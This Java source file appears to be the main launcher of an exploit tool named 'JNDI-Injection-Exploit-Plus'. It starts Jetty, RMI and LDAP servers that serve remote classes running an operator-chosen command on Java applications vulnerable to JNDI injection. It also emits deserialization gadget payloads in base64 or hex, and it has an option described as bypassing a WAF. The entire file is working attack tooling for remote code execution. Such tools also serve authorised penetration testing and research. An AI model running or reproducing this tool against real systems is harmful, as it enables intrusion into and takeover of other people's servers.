package run;

import common.Strings;
import jetty.JettyServer;
import jndi.CommonDeserial;
import jndi.LDAPRefServer;
import jndi.RMIRefServer;
import org.apache.commons.cli.*;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.StringUtils;
import org.apache.log4j.BasicConfigurator;
import org.apache.sshd.common.util.io.NullPrintStream;
import payloads.ObjectPayload;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;

import java.io.*;
import java.net.*;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.*;

import static util.Mapper.*;

/**
 * @Classname run.ServerStart
 * @Description Start servers
 */
public class ServerStart {
    public static String addr = getLocalIpByNetcard();

    //default ports
    public static int rmiPort = 43069;
    public static int ldapPort = 44069;
    private static int jettyPort = 45069;

    private URL codebase;

    private JettyServer jettyServer;
    private RMIRefServer rmiRefServer;
    private LDAPRefServer ldapRefServer;

    public static void main(String[] args) throws Exception{

        CommandLineParser parser = new DefaultParser();
        CommandLine cmd = null;
        Options opts = null;
        //default command
        String[] cmdArray = {"open","/Applications/Calculator.app"};
        String deserial = "";
        String wrapper = null;
        String deserialOutput = "base64";
        Boolean fusion = false;


        try{
            opts = cmdlineOptions();
            cmd = parser.parse(opts, args);
        }catch (Exception e){
            System.err.println("Cmdlines parse failed.");
            printBasicUsage(opts);
            System.exit(1);
        }
        if (cmd.hasOption("help")) {
            printBasicUsage(opts);
            return;
        }
        if (cmd.hasOption("C")) {
            cmdArray = cmd.getOptionValues('C');
        }
        if (cmd.hasOption("A")) {
            addr = cmd.getOptionValue('A');
        }
        if (cmd.hasOption("D")) {
            deserial = cmd.getOptionValue('D');
        }
        if (cmd.hasOption("W")) {
            wrapper = cmd.getOptionValue('W');
        }
        if (cmd.hasOption("O")) {
            deserialOutput = cmd.getOptionValue('O');
            if(!(deserialOutput.equals("base64") || deserialOutput.equals("hex"))){
                System.out.println("Error in param -O, you can only select base64 / hex");
                return;
            }
        }
        if (cmd.hasOption("F")) {
            fusion = true;
        }

        if (deserial.length() == 0) {
            ServerStart servers = new ServerStart(new URL("http://"+ addr +":"+ jettyPort +"/"),StringUtils.join(cmdArray," "));
            System.out.println("[rmiADDRESS] >> " + "rmi://" + addr + ":" + rmiPort);
            System.out.println("[ldapADDRESS] >> " + "ldap://" + addr + ":" + ldapPort);
            System.out.println("[COMMAND] >> " + withColor(StringUtils.join(cmdArray," "),ANSI_BLUE));
            Class.forName("util.Mapper");

            System.out.println("----------------------------Server Log----------------------------");
            System.out.println(getLocalTime() + " [JETTYSERVER]>> Listening on 0.0.0.0:" + jettyPort);
            Thread threadJetty = new Thread(servers.jettyServer);
            threadJetty.start();

            System.out.println(getLocalTime() + " [RMISERVER]  >> Listening on 0.0.0.0:" + rmiPort);
            Thread threadRMI = new Thread(servers.rmiRefServer);
            threadRMI.start();

            Thread threadLDAP = new Thread(servers.ldapRefServer);
            threadLDAP.start();
        }
        else{
            String cmdStr = String.join(" ", cmdArray);
            CommonDeserial commonDeserial = new CommonDeserial(cmdStr);
            byte[] deserialBytes = commonDeserial.execByDeserialize(deserial, wrapper, fusion);
            if (deserialBytes.length == 0) {
                System.out.println("Error in Deserialization, Please use the correct payload name.");
                printDeserialUsage();
                return;
            }
            if (deserialOutput.equals("base64")){
                System.out.print(Base64.getEncoder().encodeToString(deserialBytes));
            }
            else if (deserialOutput.equals("hex")){
                System.out.print(Hex.encodeHexString(deserialBytes));
            }
            else{
                System.out.println("Error in param -O, you can only select bin / base64 / hex");
            }
        }

    }

    public ServerStart(String cmd) throws Exception{
        this.codebase = new URL("http://"+ getLocalIpByNetcard() +":"+ jettyPort +"/");

        jettyServer = new JettyServer(jettyPort, this.codebase, cmd);
        rmiRefServer = new RMIRefServer(rmiPort, this.codebase, cmd);
        ldapRefServer = new LDAPRefServer(ldapPort,this.codebase, cmd);
    }

    public ServerStart(URL codebase, String cmd) throws Exception{
        this.codebase = codebase;

        jettyServer = new JettyServer(jettyPort, this.codebase, cmd);
        rmiRefServer = new RMIRefServer(rmiPort, this.codebase, cmd);
        ldapRefServer = new LDAPRefServer(ldapPort,this.codebase, cmd);
    }

    public static Options cmdlineOptions(){
        Options opts = new Options();
        Option help = new Option("help",false,"Show the help info.");
        opts.addOption(help);
        Option c = new Option("C",true,"The command executed in remote .class.");
        c.setArgs(Option.UNLIMITED_VALUES);
        opts.addOption(c);
        Option addr = new Option("A",true,"The address of server(ip or domain).");
        opts.addOption(addr);
        Option deserial = new Option("D",true,"The deserial payload name");
        opts.addOption(deserial);
        Option wrapper = new Option("W",true,"The wrapper name");
        opts.addOption(wrapper);
        Option deserialOutput = new Option("O",true,"The deserial output type, default is bin");
        opts.addOption(deserialOutput);
        Option fusion = new Option("F",false,"Fusion the Class Name to bypass WAF, default is false");
        opts.addOption(fusion);

        return opts;
    }

    /**
     * 直接根据第一个网卡地址作为其内网ipv4地址
     *
     * @return
     */
    public static String getLocalIpByNetcard() {
        try {
            for (Enumeration<NetworkInterface> e = NetworkInterface.getNetworkInterfaces(); e.hasMoreElements(); ) {
                NetworkInterface item = e.nextElement();
                for (InterfaceAddress address : item.getInterfaceAddresses()) {
                    if (item.isLoopback() || !item.isUp()) {
                        continue;
                    }
                    if (address.getAddress() instanceof Inet4Address) {
                        Inet4Address inet4Address = (Inet4Address) address.getAddress();
                        return inet4Address.getHostAddress();
                    }
                }
            }
            return InetAddress.getLocalHost().getHostAddress();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    /**
     * Get current time
     */
    public static String getLocalTime(){
        Date d = new Date();
        DateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        return sdf.format(d);
    }

    public static Boolean isLinux(){
        return !System.getProperty("os.name").toLowerCase().startsWith("win");
    }

    public static String withColor(String str,String color){
        if (isLinux()) {
            return color + str + ANSI_RESET;
        }
        return str;
    }

    private static void printBasicUsage(Options opts){
        System.out.println();
        HelpFormatter formatter = new HelpFormatter();
        formatter.printHelp("Have fun with JNDI-Injection-Exploit-Plus", opts);
        System.out.println();
        printDeserialUsage();
    }

    private static void printDeserialUsage() {
        System.out.println();
        System.out.println("JNDI-Injection-Exploit-Plus Available Deserialization Payloads:");

        final List<Class<? extends ObjectPayload>> payloadClasses =
                new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize

        final List<String[]> rows = new LinkedList<String[]>();
        rows.add(new String[] {"Payload", "Authors", "Dependencies"});
        rows.add(new String[] {"-------", "-------", "------------"});
        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
            rows.add(new String[] {
                    payloadClass.getSimpleName(),
                    Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
                    Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
            });
        }

        final List<String> lines = Strings.formatTable(rows);

        for (String line : lines) {
            System.err.println("     " + line);
        }
    }

}
